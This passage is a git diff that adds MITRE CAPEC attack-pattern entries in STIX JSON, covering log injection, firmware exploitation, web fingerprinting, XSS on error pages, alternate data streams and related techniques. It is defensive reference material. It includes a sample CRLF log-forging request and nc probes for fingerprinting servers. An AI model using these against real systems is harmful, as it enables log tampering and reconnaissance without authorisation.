    \n Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.\n For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.\n
    Directly through log file or database manipulation, modify existing log entries.
",
+ "x_capec_likelihood_of_attack": "Medium",
+ "x_capec_prerequisites": [
+ "Target server software must be a HTTP server that performs web logging."
+ ],
+ "x_capec_resources_required": [
+ "Ability to send specially formatted HTTP request to web server"
+ ],
+ "x_capec_skills_required": {
+ "Low": "To input faked entries into Web logs"
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json
new file mode 100644
index 0000000000000000000000000000000000000000..b459fc6f6803ebd5c3d532833fbc7796a1170b1b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json
@@ -0,0 +1,100 @@ +{ + "id": "bundle--7f1a4701-aed1-46a5-931d-ee5f9b9b9711", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 
2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. 
Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

  2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

  2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
",
+ "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.",
+ "x_capec_likelihood_of_attack": "Medium",
+ "x_capec_prerequisites": [
+ "Awareness of the hardware being leveraged.",
+ "Access to the hardware being leveraged, either physically or remotely."
+ ],
+ "x_capec_skills_required": {
+ "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely",
+ "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices"
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json
new file mode 100644
index 0000000000000000000000000000000000000000..5ed3bf690559ffffaf5cd92c4b4c50e54959d6aa
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json
@@ -0,0 +1,84 @@ +{ + "id": "bundle--a76fe39b-5a34-4425-bd5b-9ad0894b958f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-170", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/170.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "Saumil Shah, An Introduction to HTTP fingerprinting", + "external_id": "REF-36", + "source_name": "reference_from_CAPEC", + "url": "http://www.net-square.com/httprint_paper.html" + }, + { + "description": "OWASP Web Security Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "external_id": "REF-37", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + 
"description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-39", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.\n Response from Apache 1.3.23\n $ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1\n Response from IIS 5.0\n $ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133\n [REF-37]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Request fingerprinting: Use automated tools or send web server specific commands to web server and wait for server's response.

  2. Techniques
    Use automated tools or send web server specific commands to web server and then receive server's response.

Experiment

  1. Increase the accuracy of server fingerprinting of Web servers: Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.

  2. Techniques
    Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.
    Send bad requests or requests of nonexistent pages to the server.
    Attacker takes existing automated tools to recognize the type and the version of the web server in use.
  3. Identify Web Application Software: After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.

  4. Techniques
    Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.
    Examine the HTTP Response Headers. This may leak information about software signatures
    Examine Cookies that may contain server's software information.
    Check error pages.
  5. Identify Backend Database Version: Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.

  6. Techniques
    Use tools to send bogus SQL query to the server and check error pages.
",
+ "x_capec_likelihood_of_attack": "High",
+ "x_capec_prerequisites": [
+ "Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."
+ ],
+ "x_capec_resources_required": [
+ "While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected."
+ ],
+ "x_capec_skills_required": {
+ "Low": "Attacker knows how to send HTTP request, SQL query to a web application."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json
new file mode 100644
index 0000000000000000000000000000000000000000..74ce39b933f2ead0e19f707821ed19ba1a75dab5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json
@@ -0,0 +1,55 @@
+{
+ "id": "bundle--4655b4b6-e681-4f04-a233-beb20ba9bf87",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-543",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/543.html"
+ },
+ {
+ "description": "Masquerading: Match Legitimate Name or Location",
+ "external_id": "T1036.005",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1036/005"
+ }
+ ],
+ "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Counterfeit Websites",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_can_follow_refs": [
+ "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2",
+ "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf",
+ "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f",
+ "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501",
+ "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896"
+ ],
+ "x_capec_can_precede_refs": [
+ "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5"
+ ],
+ "x_capec_domains": [
+ "Social Engineering"
+ ],
+ "x_capec_prerequisites": [
+ "None"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json
new file mode 100644
index 0000000000000000000000000000000000000000..215b73098d21985d36d901962de1d672c3849436
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json
@@ -0,0 +1,57 @@ +{ + "id": "bundle--f71cf2c6-d5bd-4e43-993f-97d5ae306770", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \"files\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. 
Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.", + "external_references": [ + { + "external_id": "CAPEC-168", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/168.html" + }, + { + "external_id": "CWE-212", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-69", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/69.html" + }, + { + "description": "Windows alternate data stream", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Windows_alternate_data_stream" + } + ], + "id": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Windows ::DATA Alternate Data Stream", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must be running the Microsoft NTFS file system." + ], + "x_capec_resources_required": [ + "The attacker must have command line or programmatic access to the target's files system with write/read permissions." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json new file mode 100644 index 0000000000000000000000000000000000000000..f5a2d86e3557c1e12dc58f3f702507d9afe71df2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json @@ -0,0 +1,54 @@ +{ + "id": "bundle--90216c3a-8ce9-4fad-b81c-4f7714af9d48", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

  2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6db39add7d2bcc62f66635d54030aae393e383d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json 
@@ -0,0 +1,60 @@ +{ + "id": "bundle--45d9f488-0c48-4ce1-8f46-f049aca88ab6", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. 
However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json new file mode 100644 index 0000000000000000000000000000000000000000..2ee9637532ed5172af392558714158d7bfa0ebad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json 
@@ -0,0 +1,46 @@
+{
+ "id": "bundle--2b2dfb98-5c8c-4bcb-b4fa-cfc923ddad20",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-626",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/626.html"
+ }
+ ],
+ "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459",
+ "modified": "2019-09-30T00:00:00.000Z",
+ "name": "Smudge Attack",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism"
+ ]
+ },
+ "x_capec_domains": [
+ "Physical Security"
+ ],
+ "x_capec_prerequisites": [
+ "The attacker must have physical access to the device."
+ ],
+ "x_capec_skills_required": {
+ "Medium": "The attacker must know how to make use of these smudges."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json
new file mode 100644
index 0000000000000000000000000000000000000000..878c15f706158dd60a1b77d1a7de508ff5a7c25a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json
@@ -0,0 +1,87 @@ +{ + "id": "bundle--302a5fed-7497-4fd8-a269-1aaea8b4ddf2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. 
Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + 